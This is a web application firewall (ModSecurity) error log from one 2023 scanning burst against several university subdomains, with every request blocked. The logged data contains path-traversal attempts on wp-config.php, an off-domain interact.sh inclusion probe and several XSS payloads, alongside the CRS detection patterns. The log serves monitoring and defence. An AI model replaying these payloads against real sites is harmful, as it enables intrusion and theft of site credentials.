[Tue Aug 29 11:55:57.577222 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqSw2sAAAAN"]
[Tue Aug 29 11:55:57.599443 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAq5@IUAAAAK"]
[Tue Aug 29 11:55:57.600830 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqeFfwAAAAx"]
[Tue Aug 29 11:55:57.602689 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAAqTv0MAAAAa"]
[Tue Aug 29 11:55:57.627006 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XcCo-f0AAArC7cEAAAAW"]
[Tue Aug 29 11:55:57.628505 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16XcCo-f0AAAq5@IYAAAAK"]
[Tue Aug 29 11:55:58.612536 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAApbUsEAAAAh"]
[Tue Aug 29 11:55:58.619318 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAArC7cYAAAAW"]
[Tue Aug 29 11:55:58.624807 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq5@IwAAAAK"]
[Tue Aug 29 11:55:58.669718 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAApbUsIAAAAh"]
[Tue Aug 29 11:55:58.686511 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16XsCo-f0AAAq@scEAAAAM"]
[Tue Aug 29 11:55:58.738890 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAq@scMAAAAM"]
[Tue Aug 29 11:55:58.739920 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqSw3MAAAAN"]
[Tue Aug 29 11:55:58.740192 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAqTv0sAAAAa"]
[Tue Aug 29 11:55:58.761201 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16XsCo-f0AAAq5@JAAAAAK"]
[Tue Aug 29 11:55:58.781193 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../ found within ARGS:file: ../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/db-backup/download.php"] [unique_id "ZO16XsCo-f0AAArB1tcAAAAV"]
[Tue Aug 29 11:55:59.529216 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:p: <img src onerror=alert(/XSS/)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16X8Co-f0AAAq5@JEAAAAK"]
[Tue Aug 29 11:55:59.658305 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/webmail/basic/"] [unique_id "ZO16X8Co-f0AAAq@scgAAAAM"]
[Tue Aug 29 11:55:59.834626 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAArC7cwAAAAW"]
[Tue Aug 29 11:55:59.894977 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16X8Co-f0AAArB1twAAAAV"]
[Tue Aug 29 11:56:00.087484 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:p. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:p: <img src onerror=alert(/XSS/)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16YMCo-f0AAArB1t4AAAAV"]
[Tue Aug 29 11:56:00.155657 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAq@sdAAAAAM"]
[Tue Aug 29 11:56:00.157544 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAArB1t8AAAAV"]
[Tue Aug 29 11:56:00.160736 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAAqSw3wAAAAN"]
[Tue Aug 29 11:56:00.544584 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAAqSw34AAAAN"]
[Tue Aug 29 11:56:00.620297 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YMCo-f0AAAqSw4AAAAAN"]
[Tue Aug 29 11:56:00.735569 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:wpbase. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:wpbase: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/sourceafrica/js/window.php"] [unique_id "ZO16YMCo-f0AAApbUtMAAAAh"]
[Tue Aug 29 11:56:01.530619 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAq5@KMAAAAK"]
[Tue Aug 29 11:56:01.538329 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAApa-Q4AAAAg"]
[Tue Aug 29 11:56:01.539716 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqeFgQAAAAx"]
[Tue Aug 29 11:56:01.539903 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAApbUtUAAAAh"]
[Tue Aug 29 11:56:01.553104 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAq5@KQAAAAK"]
[Tue Aug 29 11:56:01.564970 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data: /onload= found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAAq@sdUAAAAM"]
[Tue Aug 29 11:56:01.613541 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:username. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: = found within ARGS:username: test\\x22><svg/onload=alert(document.domain)>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/goform/login_process"] [unique_id "ZO16YcCo-f0AAArB1uYAAAAV"]
[Tue Aug 29 11:56:01.616314 2023] [:error] [pid 2707] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:wlcms[_login_custom_js]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ; found within ARGS:wlcms[_login_custom_js]: alert(/XSS/);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-login.php"] [unique_id "ZO16YcCo-f0AAAqTv1oAAAAa"]
[Tue Aug 29 11:56:01.643108 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22)</ found within ARGS:hostname: \\x22)</script><script>alert(document.domain);</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/login.cgi"] [unique_id "ZO16YcCo-f0AAAqeFggAAAAx"]
